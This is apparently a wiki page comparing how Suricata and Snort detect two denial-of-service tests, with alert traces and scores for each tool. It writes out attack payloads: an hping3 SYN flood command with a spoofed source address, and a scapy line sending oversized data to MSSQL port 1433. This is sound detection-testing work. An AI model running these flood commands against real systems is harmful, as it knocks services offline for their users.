Suricata-vs-snort/Test-cases/Denial-of-service

From aldeid
Jump to navigation Jump to search
You are here:
DoS

Synthesis

Test Suricata Snort
hping SYN flood 1 1
DoS against MSSQL 1 1
TOTAL 2 2

Hping SYN flood

  • Test: Hping SYN flood
  • Payload:
sudo hping3 -I wlan0 -a 192.168.2.10 -S 192.168.2.245 -p 22 --flood
  • Suricata trace
ET SCAN Potential SSH Scan (Classification: Attempted Information Leak)
ET SCAN Potential SSH Scan OUTBOUND (Classification: Attempted Information Leak)
  • Suricata score: 1
  • Snort trace:
ET SCAN Potential SSH Scan (Classification: Attempted Information Leak)
ET SCAN Potential SSH Scan OUTBOUND (Classification: Attempted Information Leak)
  • Snort score: 1

DoS against MSSQL

  • Test: DoS against MSSQL
  • Payload:
sr1(IP(dst="192.168.100.35")/TCP(dport=1433)/"0"*1000)
  • Suricata trace:
03/10/11-08:21:37.786533 [**] [1:2010935:2] ET POLICY Suspicious inbound to MSSQL port 1433 [**] [Classification: Potentially Bad Traffic] [Priority: 3] {6} 192.168.100.37:20 -> 192.168.100.35:1433 [Xref => http://doc.emergingthreats.net/2010935][Xref => http://www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_DB_Connections]
03/10/11-08:21:38.359795 [**] [1:2001583:14] ET SCAN Behavioral Unusual Port 1433 traffic, Potential Scan or Infection [**] [Classification: Misc activity] [Priority: 3] {6} 192.168.100.37:20 -> 192.168.100.35:1433 [Xref => http://doc.emergingthreats.net/2001583][Xref => http://www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/SCAN/SCAN_Netbios]
  • Suricata score: 1
  • Snort trace:
[**] [129:2:1] Data on SYN packet [**]
[Priority: 3] 
03/11-08:46:33.105534 192.168.100.37:20 -> 192.168.100.36:1433
TCP TTL:64 TOS:0x0 ID:1 IpLen:20 DgmLen:41
******S* Seq: 0x0  Ack: 0x0  Win: 0x2000  TcpLen: 20
  • Snort score: 1

Comments

Talk:Suricata-vs-snort/Test-cases/Denial-of-service